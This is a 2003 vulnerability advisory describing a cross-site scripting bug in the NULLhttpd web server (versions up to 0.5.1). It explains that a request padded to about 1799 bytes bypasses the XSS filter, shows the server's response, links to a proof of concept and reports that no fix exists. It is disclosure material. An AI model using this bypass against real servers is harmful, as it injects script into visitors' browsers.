####################################################################### Luigi Auriemma Application: NULLhttpd http://nullhttpd.sourceforge.net/httpd/ Versions: <= 0.5.1 Platforms: All supported (Win & Unix) Bug: Cross site scripting Date: 24 Sep 2003 Author: Luigi Auriemma e-mail: aluigi@autistici.org web: aluigi.org ####################################################################### 1) Introduction 2) Bug 3) The Code 4) Fix ####################################################################### =============== 1) Introduction =============== "Null httpd is a very small, simple and multithreaded web server for Linux and Windows." However, as said by the author Dan Cahill, this server has not been developed for production servers or for quality and security. ####################################################################### ====== 2) Bug ====== That's not the first time that a XSS (cross site scripting) bug is found in NULLhttpd, in fact this bug was already fixed in the 0.5.1 version released one year ago, but unfortunately some "problems" in the code let this bug to be replicated (also if it already existed in previouses versions) The problem in fact is that a too long HTTP request overwrites some string of data in memory (however I have not debugged it so there are no details about) and the effect is the bypass of the check made by NULLhttpd to avoid XSS and a returned 400 (Bad Request) error page with the XSS code. Example: http://server/ [1799 bytes] [243 bytes] | | | here starts the XSS code that can be max | 243 bytes big chars needed to avoid the XSS check Answer from NULLhttpd: ---- HTTP/1.0 200 OK Cache-Control: no-store Connection: Close Content-Length: 472 Date: Tue, 23 Sep 2003 11:39:30 GMT Expires: Tue, 23 Sep 2003 11:39:30 GMT Last-Modified: aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaano-cache Pragma: no-cache Server: Null httpd 0.5.1 Content-Type: text/html xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx400 Bad Request

400 Bad Request

Can't Parse Request.
Null httpd 0.5.1
---- ####################################################################### =========== 3) The Code =========== Exploiting the problem is too simple, however I have released an html file with a link (I have used 127.0.0.1 as server so modify it) that does the work: http://aluigi.org/poc/nullhttpd051-xss.htm ####################################################################### ====== 4) Fix ====== No fix. The author was notified over 10 days ago but I have not yet received a response. #######################################################################